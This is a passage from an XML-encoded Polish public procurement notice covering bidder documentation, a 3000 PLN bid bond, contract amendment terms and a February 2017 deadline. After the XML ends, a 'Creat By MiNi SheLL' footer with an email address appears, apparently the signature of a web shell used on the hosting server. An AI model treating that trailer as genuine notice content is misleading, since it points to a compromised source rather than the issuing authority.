6. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub 	innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym 	organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
7. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej a mający miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej lub mający siedzibę poza terytorium Rzeczypospolitej Polskiej - składa dokumenty zgodnie z § 7 rozporządzenia 	Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r. poz. 1126).
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1.W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu 	należy przedłożyć wraz z ofertą oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz nie podleganiu wykluczeniu wg treści określonej w załączniku nr 3.
2.Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się 	na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. 1. Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom w celu wykazania braku istnienia wobec nich podstaw wykluczenia zamieszcza informacje o tych podmiotach w 	oświadczeniu, o którym mowa w pkt.1.
3.W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w punkcie 1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 
4. W celu uzyskania punktów w kryterium doświadczenie osób biorących udziału w realizacji zamówienia , wykonawca dołącza do oferty załącznik nr 8 do SIWZ.
5. Przed udzieleniem zamówienia, Zamawiający wezwie wykonawcę, którego oferta 	została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni,terminie, aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 PZP tj.:
1) Potwierdzających spełnianie warunków uczestnictwa:
a) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem  ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi 	zostały wykonane oraz z załączeniem dowodów określających, czy usługi te zostały wykonane w sposób należyty;
b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. 
c) w celu potwierdzenia spełnienia przez wykonawcę warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej lub finansowej wykonawca zobowiązany jest przedłożyć Zamawiającemu dokument potwierdzający, że Wykonawca jest na dzień składania dokumentów ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w rozdziale VII.2.2. SIWZ. 
Jeżeli z uzasadnionych przyczyn wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku udziału w postępowaniu.
5. Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej a mający miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej lub mający siedzibę poza terytorium Rzeczypospolitej Polskiej - składa dokumenty zgodnie z § 7 rozporządzenia 	Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r. poz. 1126).
6. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz ocenę, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający może żądać 	dokumentów, które określają w szczególności:
	1) zakres dostępnych wykonawcy zasobów innego podmiotu;
	2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
	3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
	4) czy inne podmioty, na zdolności, których wykonawca powołuje się w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują roboty budowlane lub usługi, których wskazane zdolności dotyczą.
7. W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w rozdziale VIII pkt 6 i 7 SIWZ w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz 	danych wskazane przez wykonawcę oświadczenia lub dokumenty.
8. W przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, o których mowa w 	rozdziale VIII pkt. 6 i 7 SIWZ, które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, 	zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne.
9. Wykonawca wpisany do urzędowego wykazu zatwierdzonych wykonawców lub wykonawca certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może złożyć zaświadczenie o wpisie do urzędowego wykazu wydane przez 	właściwy organ lub certyfikat wydany przez właściwą jednostkę certyfikującą kraju, w którym wykonawca ten ma siedzibę lub miejsce zamieszkania, wskazujące na dokumenty stanowiące podstawę wpisu lub uzyskania certyfikacji, w miejsce odpowiednich dokumentów wymienionych w rozdziale VIII pkt 6 i 7 SIWZ.
10. Wykonawca, w terminie 3 dni od dnia od zamieszczenia na stronie internetowej informacji o otwarciu ofert, o której mowa w art. 86 ust. 5 ustawy pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 	2015 r. poz. 184 z późn. zm.) wg treści określonej w załączniku 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 
11.W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w rozdziale VIII pkt 6 i 7 SIWZ w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych pobieranych samodzielnie przez zamawiającego, zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski wskazanych przez wykonawcę i pobranych samodzielnie przez zamawiającego dokumentów.
12. Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz ocenę, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający może żądać dokumentów, które określają w szczególności:
1) zakres dostępnych wykonawcy zasobów innego podmiotu;
2) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
3) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;
4) czy inne podmioty, na zdolności,których wykonawca powołuje się w odniesieniu do 	warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują roboty budowlane lub usługi, których wskazane zdolności dotyczą.

</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>1.Do oferty wykonawca dołącza stosowne pełnomocnictwo do podpisania oferty, jeżeli 	uprawnienie do podpisania ofert nie wynika z dokumentów rejestrowych. W przypadku podmiotów wspólnie ubiegających się o zamówienie należy dołączyć pełnomocnictwo do podpisania oferty lub pełnomocnictwo do podpisania oferty i zawarcia umowy w sprawie zamówienia publicznego.
2.Zamawiający żąda przedłożenia dokumentu potwierdzającego wniesienie wadium nie później niż w terminie wyznaczonym jako dzień składania ofert. 
3.Wykonawca, w terminie 3 dni od dnia od zamieszczenia na stronie internetowej informacji o otwarciu ofert, o której mowa w art. 86 ust. 5 ustawy pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w 	rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 	2015 r. poz. 184 z późn. zm.) wg treści określonej w załączniku 4 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. 
</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>1.Wysokość wadium wynosi: 3000 PLN (słownie: trzy tysiące złotych 00/100). 
2.Wadium musi być wniesione przed upływem terminu składania ofert. 
3.Wadium może być wniesione w jednej lub kilku niżej podanych formach w zależności od 	wyboru Wykonawcy: 
1) pieniądzu na rachunek Zamawiającego na konto:                       
Pekao SA  04 1240 4722 1111 0000 4857 8273
z dopiskiem: wadium - postępowanie nr SP-271-1-/17
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym.
3) gwarancjach bankowych, 	
4) gwarancjach ubezpieczeniowych, 
5) poręczeniach udzielanych przed podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2016 r. poz. 359). 
4.Skuteczne wniesienie wadium w pieniądzu następuje z chwilą wpływu środków pieniężnych na rachunek bankowy Zamawiającego określony w pkt. 3 ppkt. 1). 
5. Wadium wnoszone w formach określonych w pkt. 3 ppkt 2-5, musi zawierać zobowiązanie gwaranta lub poręczyciela z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Pzp, przy czym: 
1) w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia 	
Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich, 
2) dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz 
Zamawiającego bezwarunkowo i na pierwsze żądanie, 
3) dokumenty te zostaną złożone w oryginale. Zamawiający wymaga, aby oryginał gwarancji lub poręczenia był załączony do oferty. 
6. Zamawiający informuje, iż zgodnie z art. 46 ust. 4a ustawy Pzp, Zamawiający jest obowiązany zatrzymać wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy 	Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
7. Zamawiający informuje, iż zgodnie z art. 46 ust. 5 ustawy Pzp, Zamawiający jest zobowiązany zatrzymać wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Zamawiający przewiduje zmianę postanowień umowy (w tym w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy) w następującym zakresie:
1.zmiana terminu realizacji przedmiotu zamówienia, w przypadku:
a) z powodu działania siły wyższej uniemożliwiającej wykonanie usługi w określonym pierwotnie terminie o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, 
b) wystąpienia  okoliczności niezależnych od zamawiającego oraz wykonawcy, 
c) konieczności uzyskania decyzji, informacji niezbędnych do realizacji usługi lub uzgodnień, mogących spowodować wstrzymanie realizacji usługi- o czas niezbędny do uzyskania wymaganych decyzji, informacji bądź uzgodnień, 
d) konieczności zmiany harmonogramu realizacji projektu i finansowania uwarunkowanych prawidłową realizacja niniejszego projektu, 
e) przedłużenia/ skrócenia realizacji projektu. 
2.zmiana przedstawicieli stron podmiotów biorących udział w zamówieniu- np. podwykonawców, osób reprezentujących strony, wykazanych realizatorów (osób) 	realizujących zamówienie  i innych przedstawicieli/podmiotów – w przypadku niemożności 	pełnienia przez nich powierzonych funkcji, realizacji zamówienia (np. zdarzenia losowe, zmiana pracy, rezygnacja itp). 
Zamawiający dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia.
W przypadku zmiany osób realizujących zamówienie Zamawiający dopuści zmianę pod warunkiem, że nowe osoby wykażą spełnienie warunków określonych w siwz w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowe osoby. 
Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowy podmiot. 
3.zmiana zakresu rzeczowego wykonana usług zmniejszenie/zwiększenie zakresu w przypadku:
a) zmiany sposobu realizacji niniejszego projektu, 
b) rezygnacji z części zadań, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy i/lub prawidłowej realizacji projektu,
c) zmiany rodzaju, liczby usług/zadań  realizowanych w ramach projektu jeśli będzie to niezbędne do prawidłowej realizacji przedmiotu umowy i/lub prawidłowej realizacji projektu,
4.ceny ofertowej:
a) w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia, o wielkość tej stawki; 
b) w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę - wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia (wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego wykazania przez Wykonawcę wysokości dodatkowych kosztów wynikających z wprowadzenia zmian;
c w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub 	ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne - wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu Wykonawcy, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego (wprowadzenie zmian wysokości wynagrodzenia wymaga 	uprzedniego wykazania przez Wykonawcę wysokości dodatkowych koszów 	wynikających z wprowadzenia zmian);
d) w przypadku zmiany przepisów prawa, istotnie wpływającego za termin lub zakres niniejszej umowy, wartość zmian jest mniejsza niż 10 % wynagrodzenia brutto, 
5.zmiany zapisów umowy wynikające z wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy
6.Zamawiający dopuszcza inne niż powyższe możliwości zmian treści zawartej umowy w następujących okolicznościach:
a) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
b) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym 	instytucjami pośredniczącymi lub Instytucją Zarządzającą w ramach Regionalnego Programu Operacyjnego Województwa Małopolskiego 
c) Zamawiający zrezygnuje z realizacji wybranej części zamówienia 
d) Zmiana jest korzystna dla Zamawiającego, a nie była możliwa do przewidzenia w chwili zawarcia umowy
e) wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób  a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.
f) pojawienie się sytuacji nie możliwych do przewidzenia w chwili zawarcia wszczęcia postępowania
7.w celu prawidłowej realizacji projektu lub w wyniku zmian w sposobie realizacji projektu w tym zmian zakresu rzeczowego projektu  dopuszczalna jest zmiana warunków płatności określonych w umowie z wykonawcą.
8. nastąpiła zmiana stanu prawnego Zamawiającego lub Wykonawcy, zmiana adresu, zmiana osób reprezentujący Zamawiającego lub Wykonawcę.</zmiana_umowy><kryt_cena></kryt_cena><kryt_0>cena oferty brutto w PLN</kryt_0><kryt_0p>60</kryt_0p><czy_aukcja>N</czy_aukcja><aukcja_dod_info></aukcja_dod_info><elementy_aukcji_elektronicznej></elementy_aukcji_elektronicznej><ograniczenia_do_przedstawianych_wartosci></ograniczenia_do_przedstawianych_wartosci><informaje_udostepnione_wykonawcom></informaje_udostepnione_wykonawcom><informaje_przebiegu_aukcji></informaje_przebiegu_aukcji><warunki_do_licytacji></warunki_do_licytacji><wykorzystanie_sprzetu_elektronicznego></wykorzystanie_sprzetu_elektronicznego><spec_www></spec_www><spec_war></spec_war><potrzeb></potrzeb><wys_nagrod></wys_nagrod><harm_diag_kon></harm_diag_kon><pod_kon_etapy></pod_kon_etapy><data_skl>13/02/2017</data_skl><godz_skl>11:00</godz_skl><miejsce></miejsce><IV_4_4_jezyki>Język polski</IV_4_4_jezyki><termin>
        on
      </termin><okres_liczba_dni>30</okres_liczba_dni><okres_data_do></okres_data_do><le_adres_aukcja></le_adres_aukcja><le_adres_opis></le_adres_opis><le_wymagania></le_wymagania><le_postapien></le_postapien><licytacja_etapy></licytacja_etapy><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nast /><licytacja_etapya></licytacja_etapya><czas_trwania></czas_trwania><etap_1></etap_1><etap_1_c></etap_1_c><le_czy_nasta /><warunki_zamkniecia_aukcji></warunki_zamkniecia_aukcji><zastosowanie_procedury_pzp>T</zastosowanie_procedury_pzp><IV_3_1_minimalne_wymagania></IV_3_1_minimalne_wymagania><IV_3_1_Przewidziane_jest_zastrzezenie /><IV_3_1_Przewidziany_podzial /><IV_3_1_etapy_negocjacji></IV_3_1_etapy_negocjacji><IV_3_1_dodatkowe_informacje></IV_3_1_dodatkowe_informacje><IV_3_2_opis_potrzeb></IV_3_2_opis_potrzeb><IV_3_2_informacja_wysokosc_nagrod></IV_3_2_informacja_wysokosc_nagrod><IV_3_2_wstepny_harmonogram></IV_3_2_wstepny_harmonogram><IV_3_2_PodzialDialogu /><IV_3_2_EtapyDialogu></IV_3_2_EtapyDialogu><IV_3_2_DodatkoweInformacje></IV_3_2_DodatkoweInformacje><IV_3_3_ElementyOpisu></IV_3_3_ElementyOpisu><IV_3_3_PodzialNegocjacji /><IV_3_3_DodatkoweInfo></IV_3_3_DodatkoweInfo><IV_IstotnePostanowienia></IV_IstotnePostanowienia><IV_LicytacjeDodatkoweInformacje></IV_LicytacjeDodatkoweInformacje><IV_6_1_sposob_udostepniania></IV_6_1_sposob_udostepniania><IV_6_1_srodki_ochrony></IV_6_1_srodki_ochrony><IV_6_2_SkrocenieTerminu>N</IV_6_2_SkrocenieTerminu><IV_6_2_Powody></IV_6_2_Powody><IV_6_6></IV_6_6><IV_6_5>N</IV_6_5><le_data_skl /><le_godz_skl /><le_miejsce_skl /><le_term_otw /><le_term_war_zam></le_term_war_zam><wym_zab_umowy></wym_zab_umowy><istotne_post></istotne_post><inf_dodat /><czy_uniewaznienie>T</czy_uniewaznienie><informacje_o_ustanowieniu_dds></informacje_o_ustanowieniu_dds><adres_poczty_internetowej_dds></adres_poczty_internetowej_dds><informacje_dotyczace_partnerstwa_innowacyjnego></informacje_dotyczace_partnerstwa_innowacyjnego><czesci><cz_0><nr_czesci></nr_czesci><nazwa></nazwa><opis></opis><informacje_dodatkowe></informacje_dodatkowe><szacunkowa_wartosc_zamowienia_zal></szacunkowa_wartosc_zamowienia_zal><waluta_zal></waluta_zal><cpv1c></cpv1c><czas>
              O
            </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_kon></data_kon><kryt_cena></kryt_cena><kryt_1></kryt_1><kryt_1p></kryt_1p></cz_0></czesci></ZP-400>

Creat By MiNi SheLL
Email: jattceo@gmail.com